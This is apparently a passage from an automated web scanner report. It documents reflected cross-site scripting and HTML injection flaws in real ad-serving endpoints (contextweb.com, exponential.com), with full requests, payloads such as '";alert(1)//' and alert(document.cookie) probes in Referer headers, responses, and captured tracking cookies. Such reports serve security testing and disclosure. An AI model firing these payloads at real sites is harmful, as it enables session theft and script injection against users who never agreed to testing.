HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" CW-Server: CW-WEB29 Cache-Control: public, must-revalidate, max-age=0 Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT ETag: 77862555 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 4888 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 29 Jan 2011 01:39:30 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/
The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cb7"%3balert(1)//7377cbd05b7 was submitted in the cwadformat parameter. This input was echoed as c3cb7";alert(1)//7377cbd05b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250c3cb7"%3balert(1)//7377cbd05b7&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" CW-Server: CW-WEB31 Cache-Control: public, must-revalidate, max-age=0 Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT ETag: 1946838018 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 4887 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 29 Jan 2011 01:39:31 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/
The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce0e3"%3balert(1)//eaee3633345 was submitted in the cwheight parameter. This input was echoed as ce0e3";alert(1)//eaee3633345 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250ce0e3"%3balert(1)//eaee3633345&cwpnet=1&cwtagid=50151 HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB21 Cache-Control: public, must-revalidate, max-age=0 Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT ETag: 1942438807 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 4887 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 29 Jan 2011 01:39:36 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/
The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3768c"%3balert(1)//bab2d4aa7b was submitted in the cwpid parameter. This input was echoed as 3768c";alert(1)//bab2d4aa7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=5131023768c"%3balert(1)//bab2d4aa7b&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" CW-Server: CW-WEB31 Cache-Control: public, must-revalidate, max-age=0 Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT ETag: -1380734480 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 4886 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 29 Jan 2011 01:39:32 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/
The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e45c"%3balert(1)//19ca24f69bd was submitted in the cwpnet parameter. This input was echoed as 7e45c";alert(1)//19ca24f69bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=17e45c"%3balert(1)//19ca24f69bd&cwtagid=50151 HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB23 Cache-Control: public, must-revalidate, max-age=0 Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT ETag: -516785157 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 4887 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 29 Jan 2011 01:39:36 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/
The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1edbc"%3balert(1)//e4a6c8ea835 was submitted in the cwrun parameter. This input was echoed as 1edbc";alert(1)//e4a6c8ea835 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=2001edbc"%3balert(1)//e4a6c8ea835&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB24 Cache-Control: public, must-revalidate, max-age=0 Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT ETag: 400078144 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 4887 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 29 Jan 2011 01:39:31 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/
The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a3b"%3balert(1)//bb32770019f was submitted in the cwtagid parameter. This input was echoed as c1a3b";alert(1)//bb32770019f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151c1a3b"%3balert(1)//bb32770019f HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" CW-Server: CW-WEB28 Cache-Control: public, must-revalidate, max-age=0 Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT ETag: 767372036 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 4887 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 29 Jan 2011 01:39:40 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/
The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2db2f"%3balert(1)//aecfa14c61f was submitted in the cwwidth parameter. This input was echoed as 2db2f";alert(1)//aecfa14c61f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=3002db2f"%3balert(1)//aecfa14c61f&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB27 Cache-Control: public, must-revalidate, max-age=0 Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT ETag: 1713931250 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 4887 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 29 Jan 2011 01:39:35 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5152<a>ba673f094d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/NYDailyNewscomc5152<a>ba673f094d9/ROS/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5700a<a>8b3bde82dda was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/NYDailyNewscom/ROS5700a<a>8b3bde82dda/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
function expo9_ad() { var t = this; t.host = "a.tribalfusion.com"; t.site = "nydailynewscom"; t.adSpace = "ros5700a<a>8b3bde82dda"; t.tagKey = "1282868635"; t.tKey = e9TKey; t.pageId = expo9_pageId; t.center = 1; t.flashVer = 0; t.tagHash = makeTagHash(); t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d5b3<a>768ed47794e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/NYDailyNewscom6d5b3<a>768ed47794e/ROS/tags.js/ HTTP/1.1 Host: tags.expo9.exponential.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 150 X-Reuse-Index: 1 Date: Fri, 28 Jan 2011 17:06:19 GMT Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT Expires: Fri, 28 Jan 2011 18:06:19 GMT Cache-Control: max-age=3600, private Content-Type: application/x-javascript Content-Encoding: none Content-Length: 11791 Connection: Close
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a669b<a>5da8e281ab5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/NYDailyNewscom/ROSa669b<a>5da8e281ab5/tags.js/ HTTP/1.1 Host: tags.expo9.exponential.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 150 X-Reuse-Index: 1 Date: Fri, 28 Jan 2011 17:06:17 GMT Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT Expires: Fri, 28 Jan 2011 18:06:17 GMT Cache-Control: max-age=3600, private Content-Type: application/x-javascript Content-Encoding: none Content-Length: 11791 Connection: Close
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
function expo9_ad() { var t = this; t.host = "a.tribalfusion.com"; t.site = "nydailynewscom"; t.adSpace = "rosa669b<a>5da8e281ab5"; t.tagKey = "1167608151"; t.tKey = e9TKey; t.pageId = expo9_pageId; t.center = 1; t.flashVer = 0; t.tagHash = makeTagHash(); t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 673af<a>2763f6655df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/RubiconProjectAudienceExtensionMB673af<a>2763f6655df/Segment4/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f4262<a>a950a36cf07 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/RubiconProjectAudienceExtensionMB/Segment4f4262<a>a950a36cf07/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
function expo9_ad() { var t = this; t.host = "a.tribalfusion.com"; t.site = "rubiconprojectaudienceextensionmb"; t.adSpace = "segment4f4262<a>a950a36cf07"; t.tagKey = "1282868635"; t.tKey = e9TKey; t.pageId = expo9_pageId; t.center = 1; t.flashVer = 0; t.tagHash = makeTagHash(); t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d9af<a>a3ba9bc2a48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/RubiconProjectAudienceExtensionMB6d9af<a>a3ba9bc2a48/Segment4/tags.js/ HTTP/1.1 Host: tags.expo9.exponential.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 150 X-Reuse-Index: 1 Date: Fri, 28 Jan 2011 17:06:20 GMT Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT Expires: Fri, 28 Jan 2011 18:06:20 GMT Cache-Control: max-age=3600, private Content-Type: application/x-javascript Content-Encoding: none Content-Length: 11815 Connection: Close
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d6819<a>1c7b7eb55e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/RubiconProjectAudienceExtensionMB/Segment4d6819<a>1c7b7eb55e3/tags.js/ HTTP/1.1 Host: tags.expo9.exponential.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 150 X-Reuse-Index: 1 Date: Fri, 28 Jan 2011 17:06:29 GMT Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT Expires: Fri, 28 Jan 2011 18:06:29 GMT Cache-Control: max-age=3600, private Content-Type: application/x-javascript Content-Encoding: none Content-Length: 11815 Connection: Close
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
function expo9_ad() { var t = this; t.host = "a.tribalfusion.com"; t.site = "rubiconprojectaudienceextensionmb"; t.adSpace = "segment4d6819<a>1c7b7eb55e3"; t.tagKey = "1167608151"; t.tKey = e9TKey; t.pageId = expo9_pageId; t.center = 1; t.flashVer = 0; t.tagHash = makeTagHash(); t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di ...[SNIP]...
